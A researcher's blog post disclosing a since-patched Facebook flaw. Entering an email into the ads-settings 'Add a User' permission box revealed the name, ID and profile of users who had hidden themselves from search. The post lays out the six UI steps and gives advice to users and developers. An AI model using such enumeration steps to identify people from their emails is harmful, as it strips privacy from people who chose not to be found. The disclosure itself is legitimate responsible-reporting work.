My name has recently been added to the “Facebook Whitehat (http://www.facebook.com/whitehat)” page among the other security researchers that have reported security issues to Facebook directly. I have also received a very good reward for this; it took them several months to investigate my request, but it was worth it.
I am writing about it here to say you do not always need to know how to code or have ninja skills to find the bugs like this; I want to encourage everyone to participate in security bug bounty programs to help the companies to be more secure and earn money at the same time!

After all, here are the details (this bug has already been patched by Facebook):
Title of reported issue: “How to find unsearchable people by their emails in Facebook”
In order to search someone -even if they made themselves unsearchable with hidden emails- by their email addresses, it was possible to do the following steps:
1- Login into your Facebook account (you need to have an activated account with a verified email).
2- Open the following page: https://www.facebook.com/ads/manage/settings.php
3- Now under the “Permissions” section, click on “Add a User”.
4- Enter the email address that you are looking for in the box and click on “Add” and wait to see the response (it is better to choose “Reports Only” instead of “General User”). If you have not received “Invalid User” error, it means you were successful.
5- Now after refreshing the page, you should be able to see the requested user under the “Permissions” area.
6- If you click on the user’s name, you should be able to see his/her public profile.
By using this method, you could be able to find First Name, Last Name, and Facebook User ID of the user just by having his/her email address.

Recommendation to the users:
- It is always better to use a private email address in social networking websites if you really want to be unsearchable.

Recommendation to the Developers in similar situation:
- If there is any policy in the application, it should apply to all different parts of it. I suggest using the shared secure libraries that meet the requirements is one of the best options.